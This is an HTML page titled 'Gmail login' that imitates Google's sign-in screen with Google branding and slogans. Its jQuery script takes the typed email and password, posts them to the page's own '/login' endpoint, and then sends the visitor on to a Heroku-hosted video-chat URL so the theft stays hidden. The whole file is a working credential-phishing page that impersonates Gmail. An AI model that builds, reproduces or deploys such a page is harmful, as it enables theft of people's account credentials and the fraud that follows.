<html>

<head>
    <!-- Bootstrap and jQuery -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>

    <!-- Sweet Alert -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/8.11.8/sweetalert2.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/8.11.8/sweetalert2.min.css">

    <link href='https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Open+Sans:300' rel='stylesheet' type='text/css'>
    <title>Gmail login</title>

    <style>
        body {
            background: white;
            height: 700px;
            margin: 0px;
            padding: 0px;

        }

        .base {
            position: absolute;
            width: 100%;
            top: 0px;
            left: 0px;
            color: gray;

        }

        #logo {

            margin-top: 20px;

            height: 38px;
            width: 500px;
        }

        #info1 {
            width: 500px;
            margin-top: 25px;
            font-family: 'Open Sans', sans-serif;
            font-size: 38px;
            color: #555557;

        }

        #info2 {
            width: 500px;
            margin-top: 17px;
            font-family: 'Open Sans', sans-serif;
            font-size: 18px;
            font-weight: bold;
            color: #555557;

        }

        #form1 {
            margin-top: 17px;
            width: 355px;
            height: 355px;
            padding-top: 40px;
            background: #f7f7f7;
            box-shadow: 0px 0px 1px 1px #c6c1c1;

        }

        #form-img {

            width: 99px;
            height: 99px;
        }

        #mailbox {
            width: 270px;
            height: 42px;
            border-radius: 5px 5px 5px 5px;
            background: white;

            font-size: 18px;
            margin-top: 20px;
            border-width: 0px;
            border-style: solid;
            border-color: blue;
        }

        #button2 {
            width: 270px;
            height: 35px;

            margin-top: 10px;
            background: #498af2;
            font-family: verdana;
            font-size: 14px;
            color: white;
            border-radius: 5px 5px 5px 5px;
            border-width: 1px;
            border-style: solid;
            border-color: gray;
            cursor: pointer;
            outline: none;

        }

        #info3 {
            float: right;
            margin-top: 10px;
            font-size: 13px;
            font-family: 'Open Sans', sans-serif;
            color: #498af2;
            padding-right: 42px;
            font-weight: bold;
        }

        #info3 a {
            color: #498af2;
            text-decoration: none;
        }

        #info4 {
            margin-top: 25px;
            font-size: 13px;
            font-family: 'Open Sans', sans-serif;

            font-weight: bold;
        }

        #info4 a {
            color: #498af2;
            text-decoration: none;
        }

        #info5 {
            margin-top: 30px;
            font-size: 13px;
            font-family: 'Open Sans', sans-serif;
            color: #87898b;
            font-weight: bold;
        }

        #logo2 {

            margin-top: 10px;
            height: 27px;
            width: 243px;
        }

        #bottom {
            float: left;
            padding: 0px;
            margin: 0px;

        }

        #bottom ul {
            list-style: none;

        }

        #bottom ul li {
            float: left;
            margin-left: 20px;


        }
    </style>
</head>

<body>
    <center>
        <div class="base">
            <div id="logo">
                <img src="/static/images/logo.png" width="118" height="38" />
            </div>
            <div id="info1">
                One account. All of Google.
            </div>
            <div id="info2">
                Sign in to continue to Gmail
            </div>
            <div id="form1">
                <div id="form-img">
                    <img src="/static/images/profile-img.png" width="99" height="99" />
                </div>
                <div id="mailbox">
                    <input placeholder="Email" type="mail" name="email" id="email"
                        style="width:270px; height:42px; border: solid 1px #c2c4c6; font-size:16px; padding-left:8px;" />
                </div>
                <div id="mailbox">
                    <input placeholder="Password" type="password" name="password" id="password"
                        style="width:270px; height:42px; border: solid 1px #c2c4c6; font-size:16px; padding-left:8px;" />
                </div>
                <div>
                    <input type="submit" id="button2" value="Login" class="submit-btn" />
                </div>
                <!-- <div id="info3">
                    <a href="#">Need help?</a>
                </div> -->
            </div>
            <!-- <div id="info4">
                <a href="#">Create account</a>
            </div> -->
            <div id="info5">
                One Google Account for everything Google
            </div>
            <div>
                <img src="/static/images/footer-logo.png" id="logo2" />
            </div>

            <div id="bottom">

            </div>
        </div>
    </center>
    <script>
        $(function () {
            $(".submit-btn").click(function () {
                let data = {
                    username: $("#email").val(),
                    password: $("#password").val()
                }
                $.ajax({
                    url: "/login",
                    type: "post",
                    data: JSON.stringify(data),
                    dataType: 'json',
                    contentType: 'application/json',
                    success: function (result) {
                        window.location.href = "https://video-chat-app-216.herokuapp.com/ca246a1a-a5d3-4933-ad09-901ec80fabc0"
                    },
                    error: function (result) {
                        $("#loader").hide();
                        Swal.fire(
                            'Uh Oh!',
                            result.responseJSON.message,
                            'error'
                        )
                    }
                })
            })
        })
    </script>
</body>

</html>